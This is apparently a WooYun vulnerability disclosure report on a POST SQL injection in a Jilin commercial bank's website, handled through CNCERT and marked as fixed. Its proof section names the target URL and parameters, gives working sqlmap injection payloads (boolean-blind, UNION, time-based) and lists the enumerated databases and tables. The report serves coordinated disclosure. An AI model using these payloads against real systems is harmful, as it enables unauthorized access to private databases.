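Vulnerability summary (24 followers)

Bug ID: wooyun-2014-086778

Title: POST-type SQL injection at a commercial bank in Jilin

Related vendor: cncert National Internet Emergency Center

Author: SuperRookie

Submitted: 2014-12-11 14:34

Fixed: 2015-01-25 14:36

Made public: 2015-01-25 14:36

Vulnerability type: SQL injection

Severity: High

Self-assessed Rank: 10

Status: Handed over to a third-party partner organization (cncert National Internet Emergency Center) for handling

Source: http://www.wooyun.org. For questions or help, contact [email protected]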

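Vulnerability details

Disclosure status:

2014-12-11: Details reported to the vendor; awaiting vendor handling
2014-12-16: Vendor confirmed; details disclosed only to the vendor
2014-12-26: Details disclosed to core white hats and experts in related fields
2015-01-05: Details disclosed to regular white hats
2015-01-15: Details disclosed to trainee white hats
2015-01-25: Details disclosed to the public

Brief description:

SuperRookie

Detailed description:

POST SQL injection; did not dig deeper.

Proof of vulnerability: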

http://www.jtnsh.com/map/wdcx.php
gjz=88952634&shi=0&leixing=0&sheng=0
sqlmap identified the following injection points with a total of 86 HTTP(s) requests:
---
Place: POST
Parameter: sheng
Type: boolean-based blind
Title: MySQL boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause (RLIKE)
Payload: sheng=0' RLIKE (SELECT (CASE WHEN (3173=3173) THEN 0 ELSE 0x28 END)) AND 'WHXI'='WHXI&shi=0&leixing=0&gjz=88952634
Type: UNION query
Title: MySQL UNION query (NULL) - 12 columns
Payload: sheng=0' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,CONCAT(0x7161776771,0x6870595577426a777471,0x7165766371),NULL,NULL,NULL,NULL,NULL,NULL#&shi=0&leixing=0&gjz=88952634
Type: AND/OR time-based blind
Title: MySQL < 5.0.12 AND time-based blind (heavy query)
Payload: sheng=0' AND 7940=BENCHMARK(5000000,MD5(0x474c746a)) AND 'YBoM'='YBoM&shi=0&leixing=0&gjz=88952634
---
web server operating system: Windows
web application technology: Apache 2.2.21, PHP 5.3.10
back-end DBMS: MySQL >= 5.0.0
Database: shop
[176 tables]
Database: mibew_db1
[11 tables]
Database: jtnsh
[95 tables]
Database: mengs
[35 tables]
Database: shopnc
[185 tables]
Database: mysql
[24 tables]
Database: pigcms
[175 tables]
Database: mibew_db
[11 tables]
Database: oldcbsnsh
[78 tables]
Database: weili
[3 tables]
Database: atutor
[116 tables]
+----------------------------------------------------+
| at_admin_log |
| at_admins |
| at_assignments |
| at_auto_enroll |
| at_auto_enroll_courses |
| at_backups |
| at_basiclti_content |
| at_basiclti_tools |
| at_blog_posts |
| at_blog_posts_comments |
| at_blog_subscription |
| at_config |
| at_content |
| at_content_forums_assoc |
| at_content_prerequisites |
| at_content_tests_assoc |
| at_course_access |
| at_course_cats |
| at_course_enrollment |
| at_course_stats |
| at_courses |
| at_external_resources |
| at_faq_entries |
| at_faq_topics |
| at_feeds |
| at_fha_student_tools |
| at_file_storage_groups |
| at_files |
| at_files_comments |
| at_folders |
| at_forums |
| at_forums_accessed |
| at_forums_courses |
| at_forums_groups |
| at_forums_subscriptions |
| at_forums_threads |
| at_glossary |
| at_grade_scales |
| at_grade_scales_detail |
| at_gradebook_detail |
| at_gradebook_tests |
| at_groups |
| at_groups_members |
| at_groups_types |
| at_guests |
| at_handbook_notes |
| at_instructor_approvals |
| at_language_pages |
| at_language_text |
| at_languages |
| at_links |
| at_links_categories |
| at_mail_queue |
| at_master_list |
| at_member_login_attempt |
| at_member_track |
| at_members |
| at_messages |
| at_messages_sent |
| at_modules |
| at_myown_patches |
| at_myown_patches_dependent |
| at_myown_patches_files |
| at_news |
| at_oauth_client_servers |
| at_oauth_client_tokens |
| at_pa_album_comments |
| at_pa_albums |
| at_pa_course_album |
| at_pa_groups |
| at_pa_photo_comments |
| at_pa_photos |
| at_patches |
| at_patches_files |
| at_patches_files_actions |
| at_polls |
| at_polls_members |
| at_primary_resources |
| at_primary_resources_types |
| at_reading_list |
| at_related_content |
| at_resource_types |
| at_secondary_resources |
| at_secondary_resources_types |
| at_social_activities |
| at_social_application_settings |
| at_social_applications |
| at_social_friend_requests |
| at_social_friends |
| at_social_groups |
| at_social_groups_activities |
| at_social_groups_board |
| at_social_groups_invitations |
| at_social_groups_members |
| at_social_groups_requests |
| at_social_groups_types |
| at_social_member_additional_information |
| at_social_member_contact |
| at_social_member_education |
| at_social_member_personal |
| at_social_member_position |
| at_social_member_representation |
| at_social_member_track |
| at_social_member_websites |
| at_social_members_applications |
| at_social_privacy_preferences |
| at_social_user_settings |
| at_tests |
| at_tests_answers |
| at_tests_groups |
| at_tests_questions |
| at_tests_questions_assoc |
| at_tests_questions_categories |
| at_tests_results |
| at_themes |
| at_users_online |
+----------------------------------------------------+
Database: information_schema
[37 tables]
Database: jsss
[441 tables]

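Remediation:

I don't know how.

Copyright notice: when reposting, please credit the source SuperRookie@WooYun


Vulnerability response

Vendor response:

Severity: High

Vulnerability Rank: 11

Confirmed: 2014-12-16 13:46

Vendor reply:

CNVD confirmed and reproduced the reported vulnerability and has forwarded it through CNCERT to the Jilin branch center, which will follow up and coordinate with the organization that manages the website to handle it.

Latest status:

None yet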